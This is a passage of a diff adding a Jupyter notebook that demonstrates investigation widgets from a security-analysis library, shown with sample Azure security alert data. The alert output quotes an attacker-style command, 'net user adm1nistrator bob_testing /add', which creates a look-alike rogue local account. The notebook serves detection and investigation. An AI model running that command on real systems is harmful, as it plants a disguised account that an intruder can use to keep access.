+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>45</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>Unnamed: 0</th>\n",
+       "      <td>45</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>TenantId</th>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>StartTimeUtc</th>\n",
+       "      <td>2019-01-15 09:15:03</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>EndTimeUtc</th>\n",
+       "      <td>2019-01-15 09:15:03</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ProviderAlertId</th>\n",
+       "      <td>526e34b6-6578-4fc0-9db6-e126b4d673f0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>SystemAlertId</th>\n",
+       "      <td>2518547570966661760_526e34b6-6578-4fc0-9db6-e126b4d673f0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ProviderName</th>\n",
+       "      <td>Detection</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>VendorName</th>\n",
+       "      <td>Microsoft</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>AlertType</th>\n",
+       "      <td>Suspicious Account Creation Detected</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>AlertName</th>\n",
+       "      <td>Suspicious Account Creation Detected</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>AlertDisplayName</th>\n",
+       "      <td>Suspicious Account Creation Detected</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Description</th>\n",
+       "      <td>Analysis of host data on MSTICALERTSWIN1 detected creation or use of a local account adm1nistrator : this account name closely resembles a standard Windows account or group name 'administrator'. This is potentially a rogue account created by an attacker, so named in order to avoid being noticed by a human administrator.</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Severity</th>\n",
+       "      <td>Medium</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>IsIncident</th>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <td>{'Compromised Host': 'MSTICALERTSWIN1', 'User Name': 'adm1nistrator', 'Account Session Id': '0x0', 'Suspicious Process': 'c:\\windows\\system32\\net.exe', 'Suspicious Command Line': 'net  user adm1nistrator bob_testing /add', 'Parent Process': 'c:\\windows\\system32\\cmd.exe', 'Suspicious Process Id': '0x141c', 'Suspicious Account Name': 'adm1nistrator', 'Similar To Account Name': 'administrator', 'resourceType': 'Virtual Machine', 'ServiceId': '14fa08c7-c48e-4c18-950c-8148024b4398', 'ReportingSystem': 'Azure', 'OccuringDatacenter': 'eastus'}</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Entities</th>\n",
+       "      <td>[{'$id': '4', 'DnsDomain': '', 'NTDomain': '', 'HostName': 'MSTICALERTSWIN1', 'NetBiosName': 'MSTICALERTSWIN1', 'OSFamily': 'Windows', 'OSVersion': 'Windows', 'IsDomainJoined': False, 'Type': 'host'}, {'$id': '5', 'Name': 'adm1nistrator', 'Host': {'$ref': '4'}, 'Type': 'account', 'LogonId': '0x0'}, {'$id': '6', 'Directory': 'c:\\windows\\system32', 'Name': 'cmd.exe', 'Type': 'file'}, {'$id': '7', 'ProcessId': '0x165c', 'CommandLine': '', 'ImageFile': {'$ref': '6'}, 'Host': {'$ref': '4'}, 'Type': 'process'}, {'$id': '8', 'Name': 'MSTICAdmin', 'NTDomain': 'MSTICAlertsWin1', 'Sid': 'S-1-5-21-996632719-2361334927-4038480536-500', 'IsDomainJoined': False, 'Type': 'account', 'LogonId': '0x13bded7'}, {'$id': '9', 'Directory': 'c:\\windows\\system32', 'Name': 'net.exe', 'Type': 'file'}, {'$id': '10', 'ProcessId': '0x141c', 'CommandLine': 'net  user adm1nistrator bob_testing /add', 'ElevationToken': 'Default', 'CreationTimeUtc': '2019-01-15T09:15:03.3338239Z', 'ImageFile': {'$ref': '9'}, 'Account': {'$ref': '8'}, 'ParentProcess': {'$ref': '7'}, 'Host': {'$ref': '4'}, 'Type': 'process'}, {'$id': '11', 'SessionId': '0x0', 'StartTimeUtc': '2019-01-15T09:15:03.3338239Z', 'EndTimeUtc': '2019-01-15T09:15:03.3338239Z', 'Type': 'host-logon-session', 'Host': {'$ref': '4'}, 'Account': {'$ref': '5'}}]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ConfidenceLevel</th>\n",
+       "      <td>Unknown</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ConfidenceScore</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <td>3c1bb38c-82e3-4f8d-a115-a7110ba70d05</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <td>contoso77</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <td>2019-01-15 09:15:08</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ResourceId</th>\n",
+       "      <td>/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>CompromisedEntity</th>\n",
+       "      <td>MSTICALERTSWIN1</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table><br/><h3>ExtendedProperties:</h3><table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>0</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>Compromised Host</th>\n",
+       "      <td>MSTICALERTSWIN1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>User Name</th>\n",
+       "      <td>adm1nistrator</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Account Session Id</th>\n",
+       "      <td>0x0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Suspicious Process</th>\n",
+       "      <td>c:\\windows\\system32\\net.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Suspicious Command Line</th>\n",
+       "      <td>net  user adm1nistrator bob_testing /add</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Parent Process</th>\n",
+       "      <td>c:\\windows\\system32\\cmd.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Suspicious Process Id</th>\n",
+       "      <td>0x141c</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Suspicious Account Name</th>\n",
+       "      <td>adm1nistrator</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Similar To Account Name</th>\n",
+       "      <td>administrator</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>resourceType</th>\n",
+       "      <td>Virtual Machine</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ServiceId</th>\n",
+       "      <td>14fa08c7-c48e-4c18-950c-8148024b4398</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ReportingSystem</th>\n",
+       "      <td>Azure</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>OccuringDatacenter</th>\n",
+       "      <td>eastus</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table><br/><h3>Entities:</h3><br/>{ &#x27;AdditionalData&#x27;: {},,   &#x27;DnsDomain&#x27;: &#x27;&#x27;,,   &#x27;HostName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,   &#x27;IsDomainJoined&#x27;: False,,   &#x27;NTDomain&#x27;: &#x27;&#x27;,,   &#x27;NetBiosName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,   &#x27;OSFamily&#x27;: &lt;OSFamily.Windows: 1&gt;,,   &#x27;Type&#x27;: &#x27;host&#x27;}<br/>{ &#x27;AdditionalData&#x27;: {},,   &#x27;Host&#x27;: { &#x27;AdditionalData&#x27;: {},,             &#x27;DnsDomain&#x27;: &#x27;&#x27;,,             &#x27;HostName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,             &#x27;IsDomainJoined&#x27;: False,,             &#x27;NTDomain&#x27;: &#x27;&#x27;,,             &#x27;NetBiosName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,             &#x27;OSFamily&#x27;: &lt;OSFamily.Windows: 1&gt;,,             &#x27;Type&#x27;: &#x27;host&#x27;},,   &#x27;IsDomainJoined&#x27;: False,,   &#x27;LogonId&#x27;: &#x27;0x0&#x27;,,   &#x27;Name&#x27;: &#x27;adm1nistrator&#x27;,,   &#x27;Type&#x27;: &#x27;account&#x27;}<br/>{ &#x27;AdditionalData&#x27;: {},,   &#x27;Directory&#x27;: &#x27;c:\\\\windows\\\\system32&#x27;,,   &#x27;FileHashes&#x27;: [],,   &#x27;FullPath&#x27;: &#x27;c:\\\\windows\\\\system32\\\\cmd.exe&#x27;,,   &#x27;Name&#x27;: &#x27;cmd.exe&#x27;,,   &#x27;OSFamily&#x27;: &lt;OSFamily.Windows: 1&gt;,,   &#x27;PathSeparator&#x27;: &#x27;\\\\&#x27;,,   &#x27;Type&#x27;: &#x27;file&#x27;}<br/>{ &#x27;AdditionalData&#x27;: {},,   &#x27;CommandLine&#x27;: &#x27;&#x27;,,   &#x27;CreationTimeUtc&#x27;: datetime.datetime(1, 1, 1, 0, 0),,   &#x27;Host&#x27;: { &#x27;AdditionalData&#x27;: {},,             &#x27;DnsDomain&#x27;: &#x27;&#x27;,,             &#x27;HostName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,             &#x27;IsDomainJoined&#x27;: False,,             &#x27;NTDomain&#x27;: &#x27;&#x27;,,             &#x27;NetBiosName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,             &#x27;OSFamily&#x27;: &lt;OSFamily.Windows: 1&gt;,,             &#x27;Type&#x27;: &#x27;host&#x27;},,   &#x27;ImageFile&#x27;: { &#x27;AdditionalData&#x27;: {},,                  &#x27;Directory&#x27;: &#x27;c:\\\\windows\\\\system32&#x27;,,                  &#x27;FileHashes&#x27;: [],,                  &#x27;FullPath&#x27;: &#x27;c:\\\\windows\\\\system32\\\\cmd.exe&#x27;,,                  &#x27;Name&#x27;: &#x27;cmd.exe&#x27;,,                  &#x27;OSFamily&#x27;: &lt;OSFamily.Windows: 1&gt;,,                  &#x27;PathSeparator&#x27;: &#x27;\\\\&#x27;,,                  &#x27;Type&#x27;: &#x27;file&#x27;},,   &#x27;ProcessId&#x27;: &#x27;0x165c&#x27;,,   &#x27;Type&#x27;: &#x27;process&#x27;}<br/>{ &#x27;AdditionalData&#x27;: {},,   &#x27;IsDomainJoined&#x27;: False,,   &#x27;LogonId&#x27;: &#x27;0x13bded7&#x27;,,   &#x27;NTDomain&#x27;: &#x27;MSTICAlertsWin1&#x27;,,   &#x27;Name&#x27;: &#x27;MSTICAdmin&#x27;,,   &#x27;Sid&#x27;: &#x27;S-1-5-21-996632719-2361334927-4038480536-500&#x27;,,   &#x27;Type&#x27;: &#x27;account&#x27;}<br/>{ &#x27;AdditionalData&#x27;: {},,   &#x27;Directory&#x27;: &#x27;c:\\\\windows\\\\system32&#x27;,,   &#x27;FileHashes&#x27;: [],,   &#x27;FullPath&#x27;: &#x27;c:\\\\windows\\\\system32\\\\net.exe&#x27;,,   &#x27;Name&#x27;: &#x27;net.exe&#x27;,,   &#x27;OSFamily&#x27;: &lt;OSFamily.Windows: 1&gt;,,   &#x27;PathSeparator&#x27;: &#x27;\\\\&#x27;,,   &#x27;Type&#x27;: &#x27;file&#x27;}<br/>{ &#x27;Account&#x27;: { &#x27;AdditionalData&#x27;: {},,                &#x27;IsDomainJoined&#x27;: False,,                &#x27;LogonId&#x27;: &#x27;0x13bded7&#x27;,,                &#x27;NTDomain&#x27;: &#x27;MSTICAlertsWin1&#x27;,,                &#x27;Name&#x27;: &#x27;MSTICAdmin&#x27;,,                &#x27;Sid&#x27;: &#x27;S-1-5-21-996632719-2361334927-4038480536-500&#x27;,,                &#x27;Type&#x27;: &#x27;account&#x27;},,   &#x27;AdditionalData&#x27;: {},,   &#x27;CommandLine&#x27;: &#x27;net  user adm1nistrator bob_testing /add&#x27;,,   &#x27;CreationTimeUtc&#x27;: &#x27;2019-01-15T09:15:03.3338239Z&#x27;,,   &#x27;ElevationToken&#x27;: &#x27;Default&#x27;,,   &#x27;Host&#x27;: { &#x27;AdditionalData&#x27;: {},,             &#x27;DnsDomain&#x27;: &#x27;&#x27;,,             &#x27;HostName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,             &#x27;IsDomainJoined&#x27;: False,,             &#x27;NTDomain&#x27;: &#x27;&#x27;,,             &#x27;NetBiosName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,             &#x27;OSFamily&#x27;: &lt;OSFamily.Windows: 1&gt;,,             &#x27;Type&#x27;: &#x27;host&#x27;},,   &#x27;ImageFile&#x27;: { &#x27;AdditionalData&#x27;: {},,                  &#x27;Directory&#x27;: &#x27;c:\\\\windows\\\\system32&#x27;,,                  &#x27;FileHashes&#x27;: [],,                  &#x27;FullPath&#x27;: &#x27;c:\\\\windows\\\\system32\\\\net.exe&#x27;,,                  &#x27;Name&#x27;: &#x27;net.exe&#x27;,,                  &#x27;OSFamily&#x27;: &lt;OSFamily.Windows: 1&gt;,,                  &#x27;PathSeparator&#x27;: &#x27;\\\\&#x27;,,                  &#x27;Type&#x27;: &#x27;file&#x27;},,   &#x27;ParentProcess&#x27;: { &#x27;AdditionalData&#x27;: {},,                      &#x27;CommandLine&#x27;: &#x27;&#x27;,,                      &#x27;CreationTimeUtc&#x27;: datetime.datetime(1, 1, 1, 0, 0),,                      &#x27;Host&#x27;: { &#x27;AdditionalData&#x27;: {},,                                &#x27;DnsDomain&#x27;: &#x27;&#x27;,,                                &#x27;HostName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,                                &#x27;IsDomainJoined&#x27;: False,,                                &#x27;NTDomain&#x27;: &#x27;&#x27;,,                                &#x27;NetBiosName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,                                &#x27;OSFamily&#x27;: &lt;OSFamily.Windows: 1&gt;,,                                &#x27;Type&#x27;: &#x27;host&#x27;},,                      &#x27;ImageFile&#x27;: { &#x27;AdditionalData&#x27;: {},,                                     &#x27;Directory&#x27;: &#x27;c:\\\\windows\\\\system32&#x27;,,                                     &#x27;FileHashes&#x27;: [],,                                     &#x27;FullPath&#x27;: &#x27;c:\\\\windows\\\\system32\\\\cmd.exe&#x27;,,                                     &#x27;Name&#x27;: &#x27;cmd.exe&#x27;,,                                     &#x27;OSFamily&#x27;: &lt;OSFamily.Windows: 1&gt;,,                                     &#x27;PathSeparator&#x27;: &#x27;\\\\&#x27;,,                                     &#x27;Type&#x27;: &#x27;file&#x27;},,                      &#x27;ProcessId&#x27;: &#x27;0x165c&#x27;,,                      &#x27;Type&#x27;: &#x27;process&#x27;},,   &#x27;ProcessId&#x27;: &#x27;0x141c&#x27;,,   &#x27;Type&#x27;: &#x27;process&#x27;}<br/>{ &#x27;Account&#x27;: { &#x27;AdditionalData&#x27;: {},,                &#x27;Host&#x27;: { &#x27;AdditionalData&#x27;: {},,                          &#x27;DnsDomain&#x27;: &#x27;&#x27;,,                          &#x27;HostName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,                          &#x27;IsDomainJoined&#x27;: False,,                          &#x27;NTDomain&#x27;: &#x27;&#x27;,,                          &#x27;NetBiosName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,                          &#x27;OSFamily&#x27;: &lt;OSFamily.Windows: 1&gt;,,                          &#x27;Type&#x27;: &#x27;host&#x27;},,                &#x27;IsDomainJoined&#x27;: False,,                &#x27;LogonId&#x27;: &#x27;0x0&#x27;,,                &#x27;Name&#x27;: &#x27;adm1nistrator&#x27;,,                &#x27;Type&#x27;: &#x27;account&#x27;},,   &#x27;AdditionalData&#x27;: {},,   &#x27;EndTimeUtc&#x27;: &#x27;2019-01-15T09:15:03.3338239Z&#x27;,,   &#x27;Host&#x27;: { &#x27;AdditionalData&#x27;: {},,             &#x27;DnsDomain&#x27;: &#x27;&#x27;,,             &#x27;HostName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,             &#x27;IsDomainJoined&#x27;: False,,             &#x27;NTDomain&#x27;: &#x27;&#x27;,,             &#x27;NetBiosName&#x27;: &#x27;MSTICALERTSWIN1&#x27;,,             &#x27;OSFamily&#x27;: &lt;OSFamily.Windows: 1&gt;,,             &#x27;Type&#x27;: &#x27;host&#x27;},,   &#x27;SessionId&#x27;: &#x27;0x0&#x27;,,   &#x27;StartTimeUtc&#x27;: &#x27;2019-01-15T09:15:03.3338239Z&#x27;,,   &#x27;Type&#x27;: &#x27;host-logon-session&#x27;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from IPython.display import HTML\n",
+    "security_alert = None\n",
+    "\n",
+    "# create a function to get the displayable object\n",
+    "def alert_with_entities(alert):\n",
+    "    return HTML(SecurityAlert(alert).to_html(show_entities=True))\n",
+    "                \n",
+    "alert_select = nbwidgets.SelectAlert(alerts=alerts.query('CompromisedEntity == \"MSTICALERTSWIN1\"'), \n",
+    "                                     action=alert_with_entities)\n",
+    "display(Markdown('### Or a more detailed display with extracted entities'))\n",
+    "alert_select"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='SelectItem'></a>[Contents](#contents)\n",
+    "## SelectItem\n",
+    "\n",
+    "Similar to AlertSelector but simpler and allows you to use any list or dictionary of items.\n",
+    "\n",
+    "```\n",
+    "Selection list from list or dict.\n",
+    "\n",
+    "Attributes:\n",
+    "    value : The selected value.\n",
+    "Init docstring:\n",
+    "Select an item from a list or dict.\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "description : str, optional\n",
+    "    The widget label to display (the default is None)\n",
+    "item_list : List[str], optional\n",
+    "    A `list` of items to select from (the default is None)\n",
+    "item_dict : Mapping[str, str], optional\n",
+    "    A `dict` of items to select from. When using `item_dict`\n",
+    "    the keys are displayed as the selectable items and value\n",
+    "    corresponding to the selected key is set as the `value`\n",
+    "    property.\n",
+    "    (the default is None)\n",
+    "action : Callable[..., None], optional\n",
+    "    function to call when item selected (passed a single\n",
+    "    parameter - the value of the currently selected item)\n",
+    "    (the default is None)\n",
+    "auto_display : bool, optional\n",
+    "    Whether to display on instantiation (the default is False)\n",
+    "height : str, optional\n",
+    "    Selection list height (the default is '100px')\n",
+    "width : str, optional\n",
+    "    Selection list width (the default is '50%')\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T22:40:00.225872Z",
+     "start_time": "2019-12-19T22:40:00.198893Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "301b70801d274c23a85808249ab93304",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>host</h3>{&nbsp;'AdditionalData':&nbsp;{},<br>&nbsp;&nbsp;'DnsDomain':&nbsp;'',<br>&nbsp;&nbsp;'HostName':&nbsp;'MSTICALERTSWIN1',<br>&nbsp;&nbsp;'IsDomainJoined':&nbsp;False,<br>&nbsp;&nbsp;'NTDomain':&nbsp;'',<br>&nbsp;&nbsp;'NetBiosName':&nbsp;'MSTICALERTSWIN1',<br>&nbsp;&nbsp;'OSFamily':&nbsp;<OSFamily.Windows:&nbsp;1>,<br>&nbsp;&nbsp;'Type':&nbsp;'host'}"
+      ],
+      "text/plain": [
+       "Host(HostName=MSTICALERTSWIN1, NetBiosName=MSTICALERTSWIN1, OSFamily=OSFamily.Windows...)"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# extract the entities from the previously selected alert\n",
+    "security_alert = SecurityAlert(alert_select.selected_alert)\n",
+    "if security_alert is None:\n",
+    "    security_alert = SecurityAlert(alerts.iloc[1])\n",
+    "ent_dict = {ent['Type']:ent for ent in security_alert.entities}\n",
+    "\n",
+    "# from IPython.display import HTML\n",
+    "\n",
+    "# # create a display function for the entities\n",
+    "# def entity_to_html(entity):\n",
+    "#     e_text = str(entity)\n",
+    "#     e_type = entity.Type\n",
+    "#     e_text = e_text.replace(\"\\n\", \"<br>\").replace(\" \", \"&nbsp;\")\n",
+    "#     return HTML(f\"<h3>{e_type}</h3>{e_text}\")\n",
+    "    \n",
+    "nbwidgets.SelectItem(item_dict=ent_dict,\n",
+    "                       description='Select an item',\n",
+    "                       action=lambda x: x,\n",
+    "                       auto_display=True);\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='GetEnvironmentKey'></a>[Contents](#contents)\n",
+    "## GetEnvironmentKey\n",
+    "Get editable value of environment variable. Common use would be retrieving an API key from your environment or allowing you to paste in a value if the environment key isn't set.\n",
+    "\n",
+    "Note setting the variable only persists in the python kernel process running at the time. So you can retrieve it later in the notebook but not in other processes."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T22:43:18.702480Z",
+     "start_time": "2019-12-19T22:43:18.680497Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "bcb95a78b12e4bec8dc618165c082278",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(Text(value='C:\\\\Users\\\\Ian', description='Enter the value: ', layout=Layout(width='50%'), style…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "nbwidgets.GetEnvironmentKey(env_var='userprofile', auto_display=True);"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='SelectSubset'></a>[Contents](#contents)\n",
+    "## SelectSubset\n",
+    "Allows you to select one or multiple items from a list to populate an output set.\n",
+    "\n",
+    "```\n",
+    "Class to select a subset from an input list.\n",
+    "\n",
+    "    Attributes\n",
+    "    ----------\n",
+    "    selected_values : List[Any]\n",
+    "        The selected item values.\n",
+    "    selected_items : List[Any]\n",
+    "        The selected items label and value\n",
+    "        \n",
+    "Init docstring:\n",
+    "Create instance of SelectSubset widget.\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "source_items : Union[Dict[str, str], List[Any]]\n",
+    "    List of source items - either a dictionary(label, value),\n",
+    "    a simple list or\n",
+    "    a list of (label, value) tuples.\n",
+    "default_selected : Union[Dict[str, str], List[Any]]\n",
+    "    Populate the selected list with values - either\n",
+    "    a dictionary(label, value),\n",
+    "    a simple list or\n",
+    "    a list of (label, value) tuples.\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T22:52:10.297759Z",
+     "start_time": "2019-12-19T22:52:10.252790Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "147ba80092754eb4a365b16a22723cde",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), HBo…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Simple list\n",
+    "items = list(alerts[\"AlertName\"].values)\n",
+    "sel_sub = nbwidgets.SelectSubset(source_items=items)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T22:52:37.922930Z",
+     "start_time": "2019-12-19T22:52:37.880962Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "ff81a92a887c4e0c84da4b455a74d6ad",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), HBo…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Label/Value pair items with a a subset of pre-selected items\n",
+    "items = {v: k for k, v in alerts[\"AlertName\"].to_dict().items()}\n",
+    "pre_selected = {v: k for k, v in alerts[\"AlertName\"].to_dict().items() if \"commandline\" in v}\n",
+    "sel_sub = nbwidgets.SelectSubset(source_items=items, default_selected=pre_selected)\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-02T23:54:08.581230Z",
+     "start_time": "2019-09-02T23:54:08.577235Z"
+    },
+    "scrolled": true,
+    "tags": []
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Values: [79, 109, 83] \n",
+      "\n",
+      "Items: [('Detected suspicious commandline arguments', 79), ('Detected suspicious commandline used to start all executables in a directory', 109), ('Detected suspicious credentials in commandline', 83)]\n"
+     ]
+    }
+   ],
+   "source": [
+    "print(\"Values:\", sel_sub.selected_values, \"\\n\")\n",
+    "print(\"Items:\", sel_sub.selected_items)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Progress Indicator"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 17,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T23:04:17.717178Z",
+     "start_time": "2019-12-19T23:04:14.399755Z"
+    },
+    "tags": []
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "138dbaae0c53403daa58e027a8909159",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:', layout=Layout(visibility='visib…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "d8ce53cb35d1446a87a0a298a8606116",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:', layout=Layout(visibility='visib…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Volume goes to eleven!\n"
+     ]
+    }
+   ],
+   "source": [
+    "from time import sleep\n",
+    "progress = nbwidgets.Progress(completed_len=2000)\n",
+    "for i in range(0, 2100, 100):\n",
+    "    progress.update_progress(new_total=i)\n",
+    "    sleep(0.1)\n",
+    "    \n",
+    "inc_progress = nbwidgets.Progress(completed_len=10)\n",
+    "for i in range(0, 11):\n",
+    "    inc_progress.update_progress(delta=1)\n",
+    "    sleep(0.1)\n",
+    "print(\"Volume goes to eleven!\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Logon Display\n",
+    "Display logon details for a Windows or Linux logon"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 18,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "22ebd21cee9b4bafac539e7b621e9087",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "        <style>\n",
+       "            .table_logon {border-collapse: collapse; width: 50%;}\n",
+       "            .cell_logon {border: 1px solid #ddd !important;\n",
+       "                text-align: left !important; padding: 15px !important;}\n",
+       "        </style>\n",
